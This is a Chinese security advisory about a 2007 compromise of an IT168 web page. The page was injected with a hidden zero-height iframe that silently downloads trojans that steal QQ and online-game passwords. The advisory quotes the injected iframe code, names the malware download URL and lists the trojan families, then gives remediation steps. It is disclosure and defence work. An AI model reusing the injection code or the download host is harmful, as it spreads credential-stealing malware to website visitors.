DSW LabAvert小组监测到IT168网站被挂***,挂马方式采用常见的iframe框架的方式,当用户浏览IT168网站的相关页面时会触发***链接。被挂马页面为:[url]http://publish.it168.com/2007/0823/20070823024601.shtml[/url]

一、事件分析:

页面:[url]http://publish.it168.com/2007/0823/20070823024601.shtml[/url]被 插入如下代码,用以激活***页面连接:<iframe src="20070823024601_files/a.htm"frameborder="0"height="0"width="100">< /iframe>,其中a.htm内嵌了a_data/index.htm页面,index页面为***页面。当用户浏览了挂马页面后就会自动下载病 毒并运行。

下载的病毒地址为:[url]http://web.haom.us/10001/vip.exe[/url],此病毒会下载大量的病毒并运行。下载的大部分为Trojan-Spy.Win32.Delf家族的***。如:
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 10.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 11.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 12.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 13.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 14.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 15.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 16.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 18.exe
       ***程序 Trojan-Spy.Win32.Delf.abi        文件: 19.exe
       ***程序 Trojan-PSW.Win32.Nilage.bkl        文件: 2.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 20.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 4.exe
       ***程序 Trojan-Spy.Win32.Delf.abi        文件: 5.exe
       ***程序 Trojan-Downloader.Win32.Agent.csd        文件: 6.exe
       ***程序 Trojan-Spy.Win32.Delf.abi        文件: 7.exe
       ***程序 Trojan-Spy.Win32.Delf.uv        文件: 8.exe
       ***程序 Trojan-PSW.Win32.OnLineGames.akj        文件: 9.exe

他们运行后将监视用户系统,窃取用户的QQ账号/网游账号等。其中一部分***做了免杀处理以逃避杀毒软件的查杀。

                     
二、解决方案
                        
                               1、推荐安装×××监测查杀以上***。
       2、请广大用户及时使用×××的补丁检查功能,检查并安装系统补丁,预防更多的IE漏洞***。
       3、为了最快保障广大用户不受***侵害,在事件解决前请暂时不要访问登录该网站。
       4、对于已经中毒用户,建议及时修改自己的QQ/网游账号密码。


被挂马的页面截图:
it1681.jpg

a.htm代码截图:
it1682.jpg

index.htm截图:
it1683.jpg

解密后的index.htm:
it1684.jpg